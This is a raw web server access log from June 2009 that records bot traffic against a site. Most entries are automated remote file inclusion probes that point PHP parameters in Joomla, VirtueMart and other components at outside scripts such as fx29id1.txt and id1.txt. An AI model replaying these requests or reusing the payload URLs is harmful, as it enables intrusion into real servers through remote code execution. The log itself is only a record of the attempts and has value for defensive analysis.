62.140.23.192 - - [04/Jun/2009:08:25:20 -0500] "GET /logs/access_log.1231545600/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:25:20 -0500] "GET /logs/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:25:32 -0500] "GET /logs/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:25:32 -0500] "GET /logs/access_log.1231545600/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:25:32 -0500] "GET /littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:25:34 -0500] "GET /logs/access_log.1233187200/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:25:45 -0500] "GET /logs/access_log.1233187200/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:25:52 -0500] "GET /logs/ask_password.php?dir=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:25:52 -0500] "GET /ask_password.php?dir=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:25:53 -0500] "GET /logs/access_log.1231545600/ask_password.php?dir=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:26:09 -0500] "GET /logs/ask_password.php?dir=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:26:09 -0500] "GET /ask_password.php?dir=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:26:09 -0500] "GET /logs/access_log.1231545600/ask_password.php?dir=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
190.120.227.18 - - [04/Jun/2009:08:26:13 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:27:07 -0500] "GET /logs/access_log.1226448000/ask_password.php?dir=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:08:29:17 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.67.20.178 - - [04/Jun/2009:08:38:08 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
80.67.20.178 - - [04/Jun/2009:08:38:08 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
80.67.20.178 - - [04/Jun/2009:08:38:08 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.67.20.178 - - [04/Jun/2009:08:38:37 -0500] "GET /logs/access_log.1242000000//include/bbs.lib.inc.php?site_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.106.243 - - [04/Jun/2009:08:38:37 -0500] "GET /logs/access_log.1207008000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.200.54 - - [04/Jun/2009:08:40:32 -0500] "GET /logs/access_log.1237420800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:40:39 -0500] "GET /logs/access_log.1237420800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:40:42 -0500] "GET /logs/access_log.1237420800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
122.200.150.250 - - [04/Jun/2009:08:44:43 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:08:47:19 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:08:47:19 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:08:47:19 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:08:47:19 -0500] "GET /logs/access_log.1230163200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:08:47:23 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 299 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:08:47:38 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:08:47:38 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:08:47:38 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:08:47:38 -0500] "GET /logs/access_log.1230163200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:08:48:21 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:08:48:21 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:08:48:21 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:08:48:26 -0500] "GET /logs/access_log.1230163200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:08:48:56 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:08:48:56 -0500] "GET //?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:08:48:58 -0500] "GET /logs//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 191989 "-""Mozilla/5.0"
110.45.144.89 - - [04/Jun/2009:08:50:31 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.fabricnara.com/pma/libraries/id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
110.45.144.89 - - [04/Jun/2009:08:50:31 -0500] "GET /include/lib.inc.php?site_path=http://www.fabricnara.com/pma/libraries/id.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
110.45.144.89 - - [04/Jun/2009:08:50:31 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.fabricnara.com/pma/libraries/id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
110.45.144.89 - - [04/Jun/2009:08:51:07 -0500] "GET /logs/access_log.1242000000/include/lib.inc.php?site_path=http://www.fabricnara.com/pma/libraries/id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
82.151.132.176 - - [04/Jun/2009:08:54:06 -0500] "GET /logs/access_log.1238371200/ncaster/admin/addons/archive/archive.php?adminfolder=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 350 "-""Mozilla/5.0"
82.151.132.176 - - [04/Jun/2009:08:54:06 -0500] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 323 "-""Mozilla/5.0"
82.151.132.176 - - [04/Jun/2009:08:54:06 -0500] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 328 "-""Mozilla/5.0"
82.151.132.176 - - [04/Jun/2009:08:54:06 -0500] "GET /logs/access_log.1234224000/ncaster/admin/addons/archive/archive.php?adminfolder=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 350 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:08:54:12 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.67.20.178 - - [04/Jun/2009:08:58:46 -0500] "GET /errors.php?error=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.20.178 - - [04/Jun/2009:08:58:46 -0500] "GET /logs/access_log.1237852800/errors.php?error=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.20.178 - - [04/Jun/2009:08:58:46 -0500] "GET /logs/errors.php?error=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:01:30 -0500] "GET /logs/access_log.1236816000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:01:30 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:01:30 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:02:00 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:09:02:53 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:09:02:53 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:09:02:53 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:09:02:53 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:09:05:09 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:09:05:09 -0500] "GET /logs/access_log.1239926400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:09:05:09 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:09:08:34 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:09:08:34 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:09:08:34 -0500] "GET /logs/access_log.1240444800///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:09:09:58 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:09:09:58 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:09:09:58 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:09:10:14 -0500] "GET /logs/access_log.1240444800///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:09:11:21 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:09:11:21 -0500] "GET /logs/access_log.1239926400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:09:11:21 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:09:11:21 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:09:13:17 -0500] "GET //categories.php?GLOBALS[amilogged]=true&categoriesenabled=yes&GLOBALS[absoluteurl]=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
87.106.67.146 - - [04/Jun/2009:09:13:18 -0500] "GET /logs//categories.php?GLOBALS[amilogged]=true&categoriesenabled=yes&GLOBALS[absoluteurl]=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
201.232.54.48 - - [04/Jun/2009:09:17:26 -0500] "GET /logs/access_log.1242000000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:09:17:38 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:09:17:38 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:09:17:55 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:09:17:55 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:09:17:55 -0500] "GET /logs/access_log.1239926400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:09:18:00 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:09:18:08 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:09:18:08 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:09:18:08 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:09:18:15 -0500] "GET /logs/access_log.1240444800///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.204 - - [04/Jun/2009:09:19:05 -0500] "GET /logs/access_log.1114300800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.106.135.14 - - [04/Jun/2009:09:21:51 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:09:21:51 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:09:21:52 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:09:23:08 -0500] "GET /logs/send_reminders.php?includedir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:09:23:08 -0500] "GET /logs/access_log.1235433600/send_reminders.php?includedir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:09:23:08 -0500] "GET /send_reminders.php?includedir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:23:23 -0500] "GET /logs//classified_right.php?language_dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.140.23.192 - - [04/Jun/2009:09:23:24 -0500] "GET //classified_right.php?language_dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
201.232.54.48 - - [04/Jun/2009:09:23:30 -0500] "GET /logs/access_log.1235001600/send_reminders.php?includedir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:09:27:02 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:09:27:02 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:09:27:02 -0500] "GET /logs/access_log.1235174400//modules/vwar/admin/admin.php?vwar_root=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:09:30:17 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:09:30:17 -0500] "GET //admin/include/lib.module.php?mod_root=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:09:30:17 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:09:30:54 -0500] "GET //?_zb_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
77.221.130.2 - - [04/Jun/2009:09:30:54 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:09:30:54 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
87.106.67.146 - - [04/Jun/2009:09:30:58 -0500] "GET /logs//?_zb_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 200 191989 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
87.106.67.146 - - [04/Jun/2009:09:31:59 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
87.106.67.146 - - [04/Jun/2009:09:32:09 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 200 191989 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
211.203.180.144 - - [04/Jun/2009:09:32:54 -0500] "GET /logs/access_log.1240790400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
211.203.180.144 - - [04/Jun/2009:09:32:54 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
211.203.180.144 - - [04/Jun/2009:09:32:54 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:09:33:15 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:09:33:15 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:09:33:15 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:09:33:15 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:09:33:15 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:09:33:15 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:09:34:05 -0500] "GET //admin/include/lib.module.php?mod_root=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:09:34:05 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:09:34:05 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:09:34:46 -0500] "GET /logs/access_log.1235260800///?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:09:34:49 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 191990 "-""Mozilla/5.0"
210.112.121.225 - - [04/Jun/2009:09:36:18 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
